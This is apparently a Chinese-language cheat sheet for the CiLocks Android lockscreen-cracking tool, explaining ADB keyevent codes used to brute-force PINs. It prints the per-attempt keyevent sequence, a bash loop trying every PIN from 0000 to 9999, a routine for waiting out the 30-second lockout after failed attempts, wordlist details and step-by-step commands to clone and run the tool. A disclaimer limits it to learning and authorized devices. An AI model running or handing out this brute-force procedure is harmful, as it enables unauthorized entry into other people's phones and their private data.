CiLocks的keyevent速查表:8个Android按键码如何操控锁屏界面
【免费下载链接】CiLocksCrack Interface lockscreen, Metasploit and More Android/IOS Hacking项目地址: https://gitcode.com/GitHub_Trending/ci/CiLocks
CiLocks 是一款开源的 Android 锁屏破解工具,其 PIN 暴力破解模式的核心就是adb shell input keyevent命令——通过模拟实体按键,远程向锁屏界面输入数字并提交。这篇速查表带你 1 分钟看懂脚本中用到的 keyevent 按键码,适合新手理解 Android 自动化输入的底层原理。
为什么 keyevent 能操控锁屏:1分钟理解原理
Android 系统把每一次物理按键(电源键、数字键、确认键)都抽象成一个按键码(KeyCode)。只要设备通过 USB 或无线方式连上 ADB,就能在终端里发送input keyevent <数字>,系统会像真的按了那个键一样执行。
CiLocks 的破解思路非常朴素:
- 先锁屏,让 PIN 输入界面出现;
- 逐个"按"数字键,模拟输入密码;
- 按一次确认键提交;
- 判断结果,继续下一轮。
整个过程不需要破解算法,拼的是自动化 + 词表,而这一切都由下面几个按键码驱动。
keyevent 码速查表:核心按键码一览
以下按键码全部出自 CiLocks 主脚本 cilocks,按"控制"和"输入"两类整理:
3 个固定控制键码
| 按键码 | Android 键名 | 在锁屏流程中的作用 |
|---|---|---|
26 | KEYCODE_SLEEP | 模拟按电源键,把手机锁到锁屏界面 |
82 | KEYCODE_MENU | 唤醒设备,调出 PIN 输入界面 |
66 | KEYCODE_GO | 提交已输入的 PIN,触发一次验证 |
数字键码:0~9 映射为 7~16
Android 的数字键码从7开始连续排列,脚本里用数字 + 7的公式动态计算,这也是速查表里最容易记错的部分:
| 输入数字 | 按键码 | 输入数字 | 按键码 |
|---|---|---|---|
| 0 | 7 | 5 | 12 |
| 1 | 8 | 6 | 13 |
| 2 | 9 | 7 | 14 |
| 3 | 10 | 8 | 15 |
| 4 | 11 | 9 | 16 |
💡 记忆口诀:数字 + 7 = 按键码。所以
adb shell input keyevent 15输入的是数字 8,而不是 15。
暴力破解流程拆解:从锁屏到提交
以 cilocks 中的"Brute Pin 4 Digit"模式为例,每一轮尝试的按键序列是:
adb shell input keyevent 26 # 1. 锁定屏幕 adb shell input keyevent 82 # 2. 唤醒,进入PIN输入界面 # 3. 逐位输入PIN:数字+7,例如输入"1234" adb shell input keyevent 8 # 数字 1 adb shell input keyevent 9 # 数字 2 adb shell input keyevent 10 # 数字 3 adb shell input keyevent 11 # 数字 4 adb shell input keyevent 66 # 4. 提交验证脚本用 bash 循环实现了上面的逻辑(cilocks):
for i in {0000..9999}; do for (( j=0; j<${#i}; j++ )); do adb shell input keyevent $((`echo ${i:$j:1}`+7)) done adb shell input keyevent 66 done如果内置的 0000~9999 不够用,可以切换到"Wordlist"模式,脚本仓库自带两个词表:
- 4digit.txt:1 万条 4 位 PIN,按常见度排序,第一条就是
1234 - 6digit.txt:100 万条 6 位 PIN,同样以
123456开头
输错5次触发30秒延迟怎么办
多数手机连续输错 5 次 PIN 会锁定 30 秒,CiLocks 专门处理了这个边界(cilocks):
- 每试错 5 轮,再补发一次
keyevent 66; - 终端倒计时并
sleep 30等待解锁; - 重新发
keyevent 82唤醒; - 用
adb shell swipe 407 1211 378 85模拟"上滑重试"手势回到输入框。
⚠️ 注意:部分机型上keyevent 26后锁屏界面不会自动弹出输入框,此时按 README.md 的提示,把脚本里被注释掉的# adb shell input keyevent 26取消注释即可。
快速上手:三步跑起来
前置条件:Linux 环境 + ADB + USB 数据线,手机已开启 USB 调试。
git clone https://gitcode.com/GitHub_Trending/ci/CiLocks cd CiLocks sudo bash cilocks进入主菜单后,选择2. Brute Pin 4 Digit或3. Brute Pin 6 Digit即可看到上面的 keyevent 序列开始工作。更多模块说明可参考 README.md。
写在最后
keyevent 速查表看似只是 13 个数字,却是理解 Android 自动化攻击/测试的钥匙:控制键码负责"开关界面",数字键码负责"填表单",66负责"点提交"。
🔒安全提醒:本文仅用于安全学习与设备管理研究,CiLocks 项目方也明确要求"请勿用于任何非法活动"。请勿对非本人所有或未获授权的设备使用。
【免费下载链接】CiLocksCrack Interface lockscreen, Metasploit and More Android/IOS Hacking项目地址: https://gitcode.com/GitHub_Trending/ci/CiLocks
创作声明:本文部分内容由AI辅助生成(AIGC),仅供参考